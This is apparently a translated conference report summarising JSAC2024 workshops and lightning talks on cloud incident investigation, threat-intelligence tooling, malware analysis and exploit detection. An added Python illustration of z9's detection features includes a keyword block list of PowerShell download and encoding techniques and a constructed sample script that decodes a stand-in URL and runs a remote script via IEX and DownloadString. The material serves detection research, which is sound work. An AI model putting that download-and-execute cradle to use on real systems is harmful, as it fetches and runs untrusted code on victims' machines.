JSAC2024 -Workshop & Lightning talk-

We continue to introduce the talks at JSAC2024. This third issue covers workshops and lightning talks.


Introduction to Investigation of Unauthorised Access to Cloud

Speakers: Hayate Hazuru and Takahiro Yamamoto (ITOCHU Cyber & Intelligence Inc.), Norihide Saito (Flatt Security Inc.), Daisuke Miyashita (Sterra Security Co.,Ltd.)

Hayate, Takahiro, Norihide, and Daisuke explained how the cloud works and the attack methods targeting it in their workshop, followed by a log investigation demonstration based on a real security incident. First, they explained resource manipulation and authentication techniques, as well as the related processes, in the context of cloud attack and defence. By calling APIs, cloud resources can be managed through various interfaces, such as the GUI and CLI. They also touched on the authentication and authorisation functionality provided through IAM (IdP), covering token granting and operation authorisation, using AWS as an example. Next, attack techniques on the cloud were described with many case studies. Typical examples included consent phishing, which urges users to authorise a malicious client; device code phishing, which exploits device authorisation to generate tokens for victims; and software supply chain breaches, which publish fake libraries or tamper with legitimate ones. Protecting credentials such as API keys and tokens is crucial to the security of the cloud, and any resource is at risk if its credentials are stolen. Based on the above explanation, hands-on training on responding to an incident on an e-commerce site built in the cloud was provided, using logs from Amazon GuardDuty, Falco, CloudTrail and other sources. Some details were given on how to investigate a number of attacks, from initial intrusion to privilege escalation, persistence and data exfiltration. Finally, they stressed the importance of understanding each cloud's specifications and securing the container footprint. When using managed services such as Fargate or applying autoscaling configurations, users need to check whether the log files are accessible and make sure that they have not been deleted.

Infrastructure Tracking With Mihari

Speaker: Manabu Niseki

Manabu conducted a workshop on Mihari, a monitoring tool that works with a variety of services to collect and analyse threat intelligence and process data from multiple sources. Mihari connects with services such as Shodan, Censys and VirusTotal, runs searches defined as rules and stores the results in a database. It also outputs search results from the database automatically and notifies users via webhooks and other channels. A YAML file was presented that searches for services with specific titles, ports, etc., and that contains HTML hash values and SSL certificate serial numbers as the rules for finding landing pages of MoqHao, the Android malware. He also touched on threat detection and the automation of network scans by linking Mihari with the scanning tool Nuclei. The workshop environment can be set up using Docker and Visual Studio Code. The detailed description of Mihari and the exercises are available on GitHub below.

Investigation Techniques and Practice on External Attack Surface

Speakers: Kenzo Masamoto, Takeya Yamazaki, Yutaka Sejiyama, Takeshi Teshigawara (Macnica, Inc.)

Kenzo, Takeya, Yutaka and Takeshi presented a workshop on EASM (External Attack Surface Management), an initiative to understand and manage Internet-facing assets (e.g. network appliances and servers), which have recently been the entry point for cybercrime such as ransomware infection. They began the presentation with a brief description of ASM and the background on the need for EASM, explaining the percentage of incidents that have originated from Internet-facing assets in recent years. The speakers emphasised that in large enterprises it is important to identify the assets and manage patches, and that incidents are often triggered by their overseas offices. They then gave hands-on training on how to assess the risk of these assets after identification, how to conduct an efficient risk analysis and how to determine whether there are any critical vulnerabilities. They mentioned the importance of identifying the assets, assigning an asset manager and communicating smoothly with them, as well as creating an automated mechanism to prevent investigation errors. In summary, they highlighted that the audience should be aware of the vulnerable assets they hold not only in Japan but also in overseas branches, implement risk countermeasures correctly and use these to improve their own security and governance.

Lightning Talk

Where is “that” anti-debug? Introduction of AntiDebugSeeker

Speaker: Takahiro Takeda Slides (English)

Takahiro introduced AntiDebugSeeker, a tool that automatically identifies anti-debugging features in malware. AntiDebugSeeker not only extracts Windows APIs that may be used by malware for anti-debugging, but also, by using keywords as triggers, extracts other anti-debugging techniques that cannot be identified from Windows API calls alone. The detection method and the operation of the tool were explained with demonstrations, which showed how to add detection words, allowing flexible keyword searches. The tool also displays detection results in a highlighted list, jumps to specific functions from the search results and displays function descriptions. This IDA tool is available at the URL below, and a Ghidra version is now under development.

Z9 Malicious PowerShell Script Analyzer

Speakers: Maya Hyakuzuka, Issei Takenaka Slides (English)

Maya and Issei made a presentation on z9, a tool to determine whether a target PowerShell script is potentially malicious. There are many challenges in analysing PowerShell malware, as it runs fileless and is obfuscated in multiple ways. z9 runs the target PowerShell script in a sandbox and collects its Windows event logs. It identifies malware based on the following elements:

  • Invoke Expression command
  • Blacklist
  • Scoring by logistic regression
  • Percentage of symbols
  • Randomised strings
  • URLs of IoC

The detection mechanism was clarified in their talk, along with the result that the tool was able to detect malware correctly in more than 70% of the cases. The tool is available at the following URL:
https://z9.shino.club/
https://github.com/Sh1n0g1/z9
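As an added illustration of the detection elements listed above (this is not z9's own code, and it skips the sandbox and event-log collection step), the Python sketch below extracts one feature per element from a PowerShell script and combines them in a logistic-regression style score; the blacklist keywords, weights, thresholds and the two sample scripts are assumed or constructed for the example.

```python
import base64
import math
import re
from collections import Counter

URL_RE = re.compile(r"https?://[^\s'\"()]+")
IEX_RE = re.compile(r"\b(?:Invoke-Expression|IEX)\b", re.I)
# Assumed blacklist and model weights: z9's real lists and trained coefficients are not on the page.
BLACKLIST = ("downloadstring", "frombase64string", "net.webclient", "-encodedcommand")
WEIGHTS = {"iex": 2.0, "blacklist": 1.0, "symbol_ratio": 3.0, "random_names": 1.5, "urls": 1.0}
BIAS = -4.0

# Constructed sample scripts (not taken from the talk or the z9 project).
BENIGN = r"Get-ChildItem -Path C:\Logs -Filter *.log | Where-Object { $_.Length -gt 1MB } | Select-Object Name"
_B64_URL = base64.b64encode(b"http://example.invalid/a.ps1").decode()  # constructed IoC
SUSPECT = (
    f"$xQ9vTzLk = '{_B64_URL}'\n"
    "$u = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($xQ9vTzLk))\n"
    "IEX (New-Object Net.WebClient).DownloadString($u)\n"
)

def shannon_entropy(s):
    # Bits per character; randomised identifiers score high.
    return -sum(c / len(s) * math.log2(c / len(s)) for c in Counter(s).values())

def extract_urls(script):
    # URLs in the raw text, plus URLs hidden inside base64 literals (>= 20 chars).
    urls = set(URL_RE.findall(script))
    for blob in re.findall(r"[A-Za-z0-9+/]{20,}={0,2}", script):
        try:
            decoded = base64.b64decode(blob, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue  # not base64-encoded text; ignore
        urls.update(URL_RE.findall(decoded))
    return sorted(urls)

def features(script):
    # One value per detection element named in the talk summary.
    nonspace = [ch for ch in script if not ch.isspace()]
    symbols = sum(1 for ch in nonspace if not ch.isalnum())
    names = set(re.findall(r"\$(\w{6,})", script))  # $variables of 6+ characters
    return {
        "iex": int(bool(IEX_RE.search(script))),
        "blacklist": sum(1 for kw in BLACKLIST if kw in script.lower()),
        "symbol_ratio": symbols / max(len(nonspace), 1),
        "random_names": sum(1 for n in names if shannon_entropy(n) > 2.8 and re.search(r"\d", n)),
        "urls": len(extract_urls(script)),
    }

def score(script):
    # Logistic-regression style probability that the script is malicious.
    z = BIAS + sum(WEIGHTS[k] * v for k, v in features(script).items())
    return 1.0 / (1.0 + math.exp(-z))
```

Note that the symbol percentage alone is a weak signal (a benign one-liner full of pipes and parameters can score as high as obfuscated code), which is why it is only one term of the combined score.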

Bypass of anti-fraud filters with modern proxyware infrastructure: What we saw in data and how we setup the honeypot

Speaker: ChenYu "GD" Dai

GD discussed criminal activity using home proxies. The content was only available to the audience onsite.

Utilizing the Attack and Defense Perspectives of LDAP in Active Directory

Speaker: Michio Uyama

Michio described LDAP, which is used as part of attacks on Active Directory, and how its queries can be examined, verified, and used in threat hunting. He emphasised that Active Directory is an important target in APT campaigns, where reconnaissance leads to a breach, and that attackers use LDAP for this reconnaissance in the early stages of attacks against Active Directory. As LDAP is used in Kerberoasting attacks to retrieve service account information, he provided examples of characteristic LDAP queries used for reconnaissance and explained what defenders should focus on. He said he would continue to research queries to look out for in threat hunting and the effectiveness of decoys.

Smishing Monitor Release Backstory

Speaker: Yutaka Tsuge

Yutaka described Smishing Monitor, a website to raise general users' awareness of SMS fraud. There are two types of SMS filtering in Japan: firewalls and client applications. The former does not allow users to check the filtered SMSs, so the impact of false positives is high, while the latter does, so the impact is low. Next, the features and trends of smishing were mentioned. The attackers often use the Android malware MoqHao (XLOADER) and KeepSpy, and send SMSs impersonating courier services during the day and telecom carriers and financial institutions at night. Attacker tactics have recently become more sophisticated, with SMSs tied to events such as Christmas and text that reads naturally. He mentioned that the smishing monitor service, "Scam SMS Monitor", was released during Cyber Security Month in Japan.

Knowledge and Problems from the Automatic Exploit Decision Implementation in Public Repositories

Speaker: Masaya Akagi

Masaya discussed a method for early and accurate detection of exploit code on GitHub using AI. As background to this research, he mentioned that both the number of CVE-IDs issued and the amount of exploit code are on the rise, and that exploit code on GitHub is published about a month earlier than in other major archives. He stated that by automatically cloning repositories published to GitHub and applying a method based on LightGBM, it was possible to detect automatically whether the code was exploit code with an accuracy of more than 90%. In the future, he would like to implement dynamic analysis of script files and binary files, and to improve the AI's judgement by retraining on false positives.

In Closing

On 7 March 2024, "After JSAC 2024" was held, and the Best Speaker Award and the Special Recognition Award were presented. The best speaker was selected based on feedback from participants. The awardees of the Special Recognition Award were selected by the CFP Review Board. The awardees are as follows:

Best Speaker Award
Title: Introduction to Investigation of Unauthorised Access to Cloud
Speakers: Hayate Hazuru and Takahiro Yamamoto (ITOCHU Cyber & Intelligence Inc.), Norihide Saito (Flatt Security Inc.), Daisuke Miyashita (Sterra Security Co.,Ltd.)

Special Recognition Award
Title: Dark Side of VSCode ~ How Attacker Abuse VSCode as RAT ~
Speakers: Shuhei Sasada and Hayate Hazuru (ITOCHU Cyber & Intelligence Inc.)

We would like to thank all participants of JSAC2024 and everyone who read this report.

Kyosuke Nakamura (Translated by Masa Toyama)